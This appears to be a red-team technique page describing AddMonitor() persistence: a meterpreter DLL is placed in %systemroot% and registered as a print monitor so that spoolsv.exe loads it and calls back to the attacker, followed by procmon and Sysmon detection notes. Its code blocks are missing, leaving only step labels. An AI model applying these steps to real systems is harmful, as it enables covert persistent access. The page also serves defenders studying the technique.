AddMonitor()
Persistence, Privilege Escalation
Execution
Generating a 64-bit meterpreter payload to be injected into the spoolsv.exe:
attacker@local
Writing and compiling a simple C++ code that will register the monitor port:
monitor.cpp
Move evil64.dll to %systemroot%
and execute the compiled monitor.cpp
.
Observations
Upon launching the compiled executable and inspecting the victim machine with procmon, we can see that the evil64.dll is being accessed by the spoolsvc:
which eventually spawns a rundll32 with meterpreter payload, that initiates a connection back to the attacker:
The below confirms the procmon results explained above:
Sysmon commandline arguments and network connection logging to the rescue:
References
Last updated